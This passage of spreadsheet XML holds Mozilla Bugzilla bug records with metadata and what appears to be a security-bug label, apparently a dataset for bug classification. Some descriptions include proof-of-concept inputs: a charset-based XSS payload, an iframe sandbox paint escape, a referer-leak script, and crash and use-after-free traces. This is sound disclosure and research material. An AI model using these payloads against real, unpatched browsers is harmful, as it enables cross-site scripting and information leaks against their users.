        </is>
      </c>
      <c r="X1276" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1277">
      <c r="A1277" t="n">
        <v>701806</v>
      </c>
      <c r="B1277" t="inlineStr">
        <is>
          <t>2011-11-11 11:45:18 -0800</t>
        </is>
      </c>
      <c r="C1277" t="inlineStr">
        <is>
          <t>Crash [@0x0 | txStylesheetCompiler::flushCharacters]</t>
        </is>
      </c>
      <c r="D1277" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:51 -0700</t>
        </is>
      </c>
      <c r="E1277" t="n">
        <v>1</v>
      </c>
      <c r="F1277" t="n">
        <v>1</v>
      </c>
      <c r="G1277" t="n">
        <v>3</v>
      </c>
      <c r="H1277" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1277" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1277" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K1277" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1277" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1277" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1277" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1277" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P1277" t="inlineStr">
        <is>
          <t>[sg:dupe 702466]</t>
        </is>
      </c>
      <c r="Q1277" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1277" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1277" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1277" t="n">
        <v>0</v>
      </c>
      <c r="U1277" t="n">
        <v>0</v>
      </c>
      <c r="V1277" t="n">
        <v>5</v>
      </c>
      <c r="W1277" t="inlineStr">
        <is>
          <t>Created attachment 573873
testcase (crashes Firefox)
Opening the attached SVG causes a crash with null IP. The SVG uses XSL transforms.
I'm reporting this as a potential security issue even though the crash is a null, because some common ways to get a null IP (e.g. stack buffer overflow) are more likely exploitable than run-of-the-mill null reads.
Crash traces (from 64-bit Debian 6.0.3):
 8.0 - https://crash-stats.mozilla.com/report/index/bp-c39ae37b-3dfe-4cf0-8f66-257cc2111111
 9.0 beta - https://crash-stats.mozilla.com/report/index/bp-ff091148-d992-4daa-a7d5-985e42111111</t>
        </is>
      </c>
      <c r="X1277" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1278">
      <c r="A1278" t="n">
        <v>1799036</v>
      </c>
      <c r="B1278" t="inlineStr">
        <is>
          <t>2022-11-03 16:46:15 -0700</t>
        </is>
      </c>
      <c r="C1278" t="inlineStr">
        <is>
          <t>Contents can paint outside of an iframe by using &lt;dialog&gt;, position:fixed and transform</t>
        </is>
      </c>
      <c r="D1278" t="inlineStr">
        <is>
          <t>2024-06-02 11:57:04 -0700</t>
        </is>
      </c>
      <c r="E1278" t="n">
        <v>1</v>
      </c>
      <c r="F1278" t="n">
        <v>1</v>
      </c>
      <c r="G1278" t="n">
        <v>3</v>
      </c>
      <c r="H1278" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1278" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1278" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K1278" t="inlineStr">
        <is>
          <t>Firefox 91</t>
        </is>
      </c>
      <c r="L1278" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1278" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1278" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1278" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1278" t="inlineStr">
        <is>
          <t>[adv-main121+]</t>
        </is>
      </c>
      <c r="Q1278" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1278" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1278" t="inlineStr">
        <is>
          <t>120 Branch</t>
        </is>
      </c>
      <c r="T1278" t="n">
        <v>1</v>
      </c>
      <c r="U1278" t="n">
        <v>0</v>
      </c>
      <c r="V1278" t="n">
        <v>39</v>
      </c>
      <c r="W1278" t="inlineStr">
        <is>
          <t>Created attachment 9301891
testcase 1
Load this testcase:
```html
&lt;!DOCTYPE html&gt;
&lt;iframe sandbox="allow-scripts" srcdoc='
  &lt;main style="transform: scale(1)"&gt;
    &lt;dialog&gt;
      &lt;div style="position: fixed; background: cyan; padding: 10px;"&gt;Painting outside iframe!&lt;/div&gt;
    &lt;/dialog&gt;
  &lt;/main&gt;
  &lt;script&gt;document.querySelector("dialog").showModal();&lt;/script&gt;
'&gt;&lt;/iframe&gt;
```
The div is painted outside the sandboxed iframe!!!
Luckily, the parts outside the iframe don't seem to react to hit-testing, but it still seems problematic from a security perspective.
I can reproduce the problem at least since 2021-06-09 8508c35e49793fbe402ad2a706a57fabd1c2b0c4. Earlier builds instacrash any tab before I can try the testcase.</t>
        </is>
      </c>
      <c r="X1278" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1279">
      <c r="A1279" t="n">
        <v>1155293</v>
      </c>
      <c r="B1279" t="inlineStr">
        <is>
          <t>2015-04-16 10:47:51 -0700</t>
        </is>
      </c>
      <c r="C1279" t="inlineStr">
        <is>
          <t>Update to peep 2.4</t>
        </is>
      </c>
      <c r="D1279" t="inlineStr">
        <is>
          <t>2015-04-17 15:36:19 -0700</t>
        </is>
      </c>
      <c r="E1279" t="n">
        <v>1</v>
      </c>
      <c r="F1279" t="n">
        <v>1</v>
      </c>
      <c r="G1279" t="n">
        <v>7</v>
      </c>
      <c r="H1279" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1279" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1279" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1279" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1279" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1279" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1279" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1279" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1279" t="inlineStr"/>
      <c r="Q1279" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1279" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1279" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1279" t="n">
        <v>1</v>
      </c>
      <c r="U1279" t="n">
        <v>0</v>
      </c>
      <c r="V1279" t="n">
        <v>4</v>
      </c>
      <c r="W1279" t="inlineStr">
        <is>
          <t>https://github.com/erikrose/peep/releases
https://github.com/erikrose/peep/archive/2.3.zip
To pick up some of my upstream fixes:
https://github.com/erikrose/peep/compare/2.2...2.3
We can also then update from virtualenv 12.0.7 to 12.1.1, since the new peep will be compatible with the new pip (v6.1.1) that comes with virtualenv 12.1.1.</t>
        </is>
      </c>
      <c r="X1279" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1280">
      <c r="A1280" t="n">
        <v>1142944</v>
      </c>
      <c r="B1280" t="inlineStr">
        <is>
          <t>2015-03-13 04:27:03 -0700</t>
        </is>
      </c>
      <c r="C1280" t="inlineStr">
        <is>
          <t>crash in EMPTY: no crashing thread identified; ERROR_NO_THREAD_LIST</t>
        </is>
      </c>
      <c r="D1280" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E1280" t="n">
        <v>1</v>
      </c>
      <c r="F1280" t="n">
        <v>1</v>
      </c>
      <c r="G1280" t="n">
        <v>6</v>
      </c>
      <c r="H1280" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1280" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J1280" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1280" t="inlineStr">
        <is>
          <t>37 Branch</t>
        </is>
      </c>
      <c r="L1280" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1280" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1280" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1280" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1280" t="inlineStr"/>
      <c r="Q1280" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1280" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1280" t="inlineStr">
        <is>
          <t>Firefox 47</t>
        </is>
      </c>
      <c r="T1280" t="n">
        <v>1</v>
      </c>
      <c r="U1280" t="n">
        <v>0</v>
      </c>
      <c r="V1280" t="n">
        <v>37</v>
      </c>
      <c r="W1280" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-d890afcb-97d9-4548-b6f0-812d72150313.
============================================================
Sony Xperia Z2 (4.4.4)
Galaxy Note (4.4.2) 
STR's:
1. Open Firefox with a clean profile
2. Go to youtube.com and 'Request for the desktop' site 
3. Play a flash video and tap on the fullscreen button
Result: FF crashes
Note: This only happens when entering in fullscreen for the first time on a profile. In order to reproduce the crash a second time, you'll have to clear your profile and run this steps again. 
Sometimes you'll have to leave the video playing in full screen for a few seconds but eventually Firefox will crash
Reproducible on Firefox 37 and Firefox 36 including 36.0.2</t>
        </is>
      </c>
      <c r="X1280" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1281">
      <c r="A1281" t="n">
        <v>812847</v>
      </c>
      <c r="B1281" t="inlineStr">
        <is>
          <t>2012-11-17 20:25:47 -0800</t>
        </is>
      </c>
      <c r="C1281" t="inlineStr">
        <is>
          <t>Opus heap-buffer-overflow crash [@opus_multistream_decoder_init]</t>
        </is>
      </c>
      <c r="D1281" t="inlineStr">
        <is>
          <t>2016-12-01 13:38:00 -0800</t>
        </is>
      </c>
      <c r="E1281" t="n">
        <v>1</v>
      </c>
      <c r="F1281" t="n">
        <v>1</v>
      </c>
      <c r="G1281" t="n">
        <v>3</v>
      </c>
      <c r="H1281" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1281" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1281" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K1281" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1281" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1281" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1281" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1281" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1281" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q1281" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1281" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1281" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T1281" t="n">
        <v>1</v>
      </c>
      <c r="U1281" t="n">
        <v>0</v>
      </c>
      <c r="V1281" t="n">
        <v>19</v>
      </c>
      <c r="W1281" t="inlineStr">
        <is>
          <t>Created attachment 682838
testcase
media/libopus/src/opus_multistream.c:537
st-&gt;layout.nb_channels = channels;
We see the following warning before the crash:
WARNING: Opus end trimming removed more than a full packet.: file /Users/cdiehl/Code/Mozilla/mc-asan-opt/content/media/ogg/OggCodecState.cpp, line 1147
Tested with m-c changeset: 113558:9a6d708faf3f</t>
        </is>
      </c>
      <c r="X1281" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1282">
      <c r="A1282" t="n">
        <v>453736</v>
      </c>
      <c r="B1282" t="inlineStr">
        <is>
          <t>2008-09-04 17:16:15 -0700</t>
        </is>
      </c>
      <c r="C1282" t="inlineStr">
        <is>
          <t>[FIX]Crash under nsSVGElement::BindToTree with &lt;svg:use&gt;, &lt;svg:script&gt;</t>
        </is>
      </c>
      <c r="D1282" t="inlineStr">
        <is>
          <t>2009-04-21 13:57:25 -0700</t>
        </is>
      </c>
      <c r="E1282" t="n">
        <v>1</v>
      </c>
      <c r="F1282" t="n">
        <v>1</v>
      </c>
      <c r="G1282" t="n">
        <v>3</v>
      </c>
      <c r="H1282" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1282" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1282" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K1282" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1282" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1282" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1282" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1282" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1282" t="inlineStr">
        <is>
          <t>[sg:critical] see comment 27 for branches</t>
        </is>
      </c>
      <c r="Q1282" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1282" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1282" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T1282" t="n">
        <v>1</v>
      </c>
      <c r="U1282" t="n">
        <v>0</v>
      </c>
      <c r="V1282" t="n">
        <v>54</v>
      </c>
      <c r="W1282" t="inlineStr">
        <is>
          <t>Created attachment 336942
testcase (crashes Firefox within a minute)
Steps to reproduce:
1. Load the testcase from a file: URL.
2. Wait 5-60 seconds.
Result: Some kind of crash under nsSVGElement::BindToTree.  It may involve calling a bogus memory address.
You'll probably also see some of these assertions:
###!!! ASSERTION: No callbacks should be registered while we set up this entry: '!entry-&gt;HasContentChangeCallback()', file /Users/jruderman/central/content/base/src/nsDocument.cpp, line 3288
###!!! ASSERTION: Please remove this from the document properly: '!IsInDoc()', file /Users/jruderman/central/content/base/src/nsGenericElement.cpp, line 1743
###!!! ASSERTION: Already have a document.  Unbind first!: '!GetCurrentDoc() &amp;&amp; !IsInDoc()', file /Users/jruderman/central/content/base/src/nsGenericDOMDataNode.cpp, line 585
###!!! ASSERTION: Shallow unbind won't clear document and binding parent on kids!: 'aDeep || (!GetCurrentDoc() &amp;&amp; !GetBindingParent())', file /Users/jruderman/central/content/base/src/nsGenericElement.cpp, line 2730
###!!! ASSERTION: Bound to wrong document: 'aDocument == GetCurrentDoc()', file /Users/jruderman/central/content/base/src/nsGenericElement.cpp, line 2717
###!!! ASSERTION: Bound to wrong parent: 'aParent == GetParent()', file /Users/jruderman/central/content/base/src/nsGenericElement.cpp, line 2718
The testcase is loosely based on dynamic-use-01.svg, one of the most evil reftests in the Mozilla tree.</t>
        </is>
      </c>
      <c r="X1282" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1283">
      <c r="A1283" t="n">
        <v>145579</v>
      </c>
      <c r="B1283" t="inlineStr">
        <is>
          <t>2002-05-19 05:03:08 -0700</t>
        </is>
      </c>
      <c r="C1283" t="inlineStr">
        <is>
          <t>Website can see url of page visited after it (document referer used when loading images with javascript is incorrect while loading a new page)</t>
        </is>
      </c>
      <c r="D1283" t="inlineStr">
        <is>
          <t>2005-05-26 10:49:12 -0700</t>
        </is>
      </c>
      <c r="E1283" t="n">
        <v>1</v>
      </c>
      <c r="F1283" t="n">
        <v>1</v>
      </c>
      <c r="G1283" t="n">
        <v>3</v>
      </c>
      <c r="H1283" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1283" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1283" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K1283" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1283" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1283" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1283" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1283" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1283" t="inlineStr">
        <is>
          <t>[adt1] [ETA 09/19]</t>
        </is>
      </c>
      <c r="Q1283" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1283" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1283" t="inlineStr">
        <is>
          <t>mozilla1.0.2</t>
        </is>
      </c>
      <c r="T1283" t="n">
        <v>1</v>
      </c>
      <c r="U1283" t="n">
        <v>17</v>
      </c>
      <c r="V1283" t="n">
        <v>43</v>
      </c>
      <c r="W1283" t="inlineStr">
        <is>
          <t>If a new url is entered into the address bar (and enter or go is pressed) the
browser starts to look up this address.
When a javascript script loads a new image by a setTimeout-triggered event on
the current page while the browser is looking up the new address, the image has
a document referer of http://new page/ instead of http://current page/
Reproducable: always, easier on slow connections or when the server on the other
end is down.
Platform/OS/build: tested on PC/win98/1.0rc2
Refers to: bug 61660
---
code example:
&lt;html&gt;
  &lt;head&gt;
    &lt;script type="text/javascript"&gt;
      function load_image
      {
        document.images["bla"].src="bla2.jpg";
      }
    &lt;/script&gt;
  &lt;/head&gt;
  &lt;body onload="setTimeout('load_image()',10000)"&gt;
    &lt;img name="bla" src="bla.jpg"&gt;
  &lt;/body&gt;
&lt;/html&gt;
For bla2.jpg I used a php-generated image that shows the document referer as the
image.
---
How to reproduce using the above code and by replacing bla2 with an image that
shows the document referer:
- load the html page
- within the 10 second timeout enter a new url (preferably an unreachable server
that would cause a timeout) in your address bar and press enter
- while Mozilla tries to load the new url the javascript is triggered
- the javascript loads bla2.jpg using 'new url' as a document referer.
- Mozilla gives an error: 'new url' not reachable (or if you used a server that
does work it continues loading 'new url'</t>
        </is>
      </c>
      <c r="X1283" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1284">
      <c r="A1284" t="n">
        <v>601429</v>
      </c>
      <c r="B1284" t="inlineStr">
        <is>
          <t>2010-10-02 20:18:54 -0700</t>
        </is>
      </c>
      <c r="C1284" t="inlineStr">
        <is>
          <t>x-mac-arabic, x-mac-farsi and x-mac-hebrew are vulnerable to XSS</t>
        </is>
      </c>
      <c r="D1284" t="inlineStr">
        <is>
          <t>2011-02-27 22:02:09 -0800</t>
        </is>
      </c>
      <c r="E1284" t="n">
        <v>1</v>
      </c>
      <c r="F1284" t="n">
        <v>1</v>
      </c>
      <c r="G1284" t="n">
        <v>3</v>
      </c>
      <c r="H1284" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1284" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1284" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K1284" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1284" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1284" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1284" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1284" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1284" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q1284" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1284" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1284" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1284" t="n">
        <v>1</v>
      </c>
      <c r="U1284" t="n">
        <v>0</v>
      </c>
      <c r="V1284" t="n">
        <v>36</v>
      </c>
      <c r="W1284" t="inlineStr">
        <is>
          <t>x-mac-farsi exploit:
&lt;meta charset="x-mac-farsi"&gt;ｼscript ｾalert(1)//ｼ/script ｾ
I don't mark this bug as security sensitive because the exploit is already public (see the URL).</t>
        </is>
      </c>
      <c r="X1284" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1285">
      <c r="A1285" t="n">
        <v>927108</v>
      </c>
      <c r="B1285" t="inlineStr">
        <is>
          <t>2013-10-15 13:44:32 -0700</t>
        </is>
      </c>
      <c r="C1285" t="inlineStr">
        <is>
          <t>Pushing certified apps does not work</t>
        </is>
      </c>
      <c r="D1285" t="inlineStr">
        <is>
          <t>2020-01-21 14:21:09 -0800</t>
        </is>
      </c>
      <c r="E1285" t="n">
        <v>1</v>
      </c>
      <c r="F1285" t="n">
        <v>1</v>
      </c>
      <c r="G1285" t="n">
        <v>6</v>
      </c>
      <c r="H1285" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1285" t="inlineStr">
        <is>
          <t>DevTools Graveyard</t>
        </is>
      </c>
      <c r="J1285" t="inlineStr">
        <is>
          <t>WebIDE</t>
        </is>
      </c>
      <c r="K1285" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1285" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1285" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1285" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1285" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1285" t="inlineStr"/>
      <c r="Q1285" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1285" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1285" t="inlineStr">
        <is>
          <t>Firefox 27</t>
        </is>
      </c>
      <c r="T1285" t="n">
        <v>1</v>
      </c>
      <c r="U1285" t="n">
        <v>0</v>
      </c>
      <c r="V1285" t="n">
        <v>27</v>
      </c>
      <c r="W1285" t="inlineStr">
        <is>
          <t>Using Gecko from a nightly build for "latest-hamachi-eng-mozilla-central" on Oct 15, and Gaia master from Oct 15.
I tried the steps here to enable debugging and pushing of certified apps via the app manager:
https://developer.mozilla.org/en-US/docs/Mozilla/Firefox_OS/Using_the_App_Manager#Debugging_Certified_Apps
But I still get a "installationFailed: Installing certified apps is not allowed." message when trying to push the app.
Something that could indicate the core problem: webapps.js checks for a DOMApplicationRegistry.allowSideloadingCertified to allow installation:
http://mxr.mozilla.org/mozilla-central/source/toolkit/devtools/server/actors/webapps.js#391
but there are no other "allowSideloadingCertified" references found in the code.
jryans on IRC pointed to this code change as when that section last changed:
https://bugzilla.mozilla.org/attachment.cgi?id=805062&amp;action=diff
Perhaps that allowSideloadingCertified use needs to check something that checks the devtools.debugger.forbid-certified-apps pref.
Getting this to work is very useful for UX reviews for Gaia. Previously I worked out this process for them to do easier reviews of dev app snapshots:
https://github.com/jrburke/gaia-dev-zip#for-the-ux-person
but that simulator pathway no longer works with Gaia 1.2 and greater, and I was hoping to switch that process over to the app manager.</t>
        </is>
      </c>
      <c r="X1285" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1286">
      <c r="A1286" t="n">
        <v>1750679</v>
      </c>
      <c r="B1286" t="inlineStr">
        <is>
          <t>2022-01-17 20:38:36 -0800</t>
        </is>
      </c>
      <c r="C1286" t="inlineStr">
        <is>
          <t>heap-use-after-free of VRProcessParent</t>
        </is>
      </c>
      <c r="D1286" t="inlineStr">
        <is>
          <t>2024-05-30 10:53:14 -0700</t>
        </is>
      </c>
      <c r="E1286" t="n">
        <v>1</v>
      </c>
      <c r="F1286" t="n">
        <v>1</v>
      </c>
      <c r="G1286" t="n">
        <v>3</v>
      </c>
      <c r="H1286" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1286" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1286" t="inlineStr">
        <is>
          <t>WebVR</t>
        </is>
      </c>
      <c r="K1286" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1286" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1286" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1286" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1286" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1286" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-esr91.8+][adv-main98+]</t>
        </is>
      </c>
      <c r="Q1286" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1286" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1286" t="inlineStr">
        <is>
          <t>98 Branch</t>
        </is>
      </c>
      <c r="T1286" t="n">
        <v>1</v>
      </c>
      <c r="U1286" t="n">
        <v>0</v>
      </c>
      <c r="V1286" t="n">
        <v>18</v>
      </c>
      <c r="W1286" t="inlineStr">
        <is>
          <t>Tested Version: Window 10 Pro 20H2  x64  memory 32G + win64-fuzzing-asan-opt(96.0.2)
There is no way to reproduce the vulnerability, temporarily can not provide poc samples,I feel that this is a conditional competition vulnerability，The conditions for triggering this vulnerability are demanding,the crash report is as follows:
```
=================================================================
==21636==ERROR: AddressSanitizer: heap-use-after-free on address 0x1254e68ea0b0 at pc 0x7fff352febc2 bp 0x00db761fc6a0 sp 0x00db761fc6e8
READ of size 8 at 0x1254e68ea0b0 thread T0
    #0 0x7fff352febc1 in mozilla::gfx::VRProcessParent::InitAfterConnect /builds/worker/checkouts/gecko/gfx/vr/ipc/VRProcessParent.cpp:165
    #1 0x7fff3360613d in mozilla::ipc::TaskFactory&lt;mozilla::net::SocketProcessHost&gt;::TaskWrapper&lt;mozilla::ipc::TaskFactory&lt;mozilla::net::SocketProcessHost&gt;::RunnableMethod&lt;void (mozilla::net::SocketProcessHost::*)(),Tuple0&gt; &gt;::Run /builds/worker/workspace/obj-build/dist/include/mozilla/ipc/TaskFactory.h:37
    #2 0x7fff324c3c5e in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:468
    #3 0x7fff3247dc88 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:771
    #4 0x7fff3247a62c in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:607
    #5 0x7fff3247aff4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:391
    #6 0x7fff324ca6a1 in mozilla::detail::RunnableFunction&lt;`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:124:7'&gt;::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:531
    #7 0x7fff324a66d4 in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1195
    #8 0x7fff324b6b3c in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
    #9 0x7fff338c823d in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #10 0x7fff337e12d5 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #11 0x7fff337e10a5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #12 0x7fff3b367e1a in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137
    #13 0x7fff3b554d6a in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:603
    #14 0x7fff3f3bb68b in nsAppStartup::Run /builds/worker/checkouts/gecko/toolkit/components/startup/nsAppStartup.cpp:295
    #15 0x7fff3f66f01c in XREMain::XRE_mainRun /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5317
    #16 0x7fff3f67518e in XREMain::XRE_main /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5502
    #17 0x7fff3f67640a in XRE_main /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5561
    #18 0x7ff7523e2588 in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:395
    #19 0x7ff7523e17ad in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:147
    #20 0x7ff7524dca27 in __scrt_common_main_seh d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #21 0x7fff8bc37033 in BaseThreadInitThunk+0x13 (C:\WINDOWS\System32\KERNEL32.DLL+0x180017033)
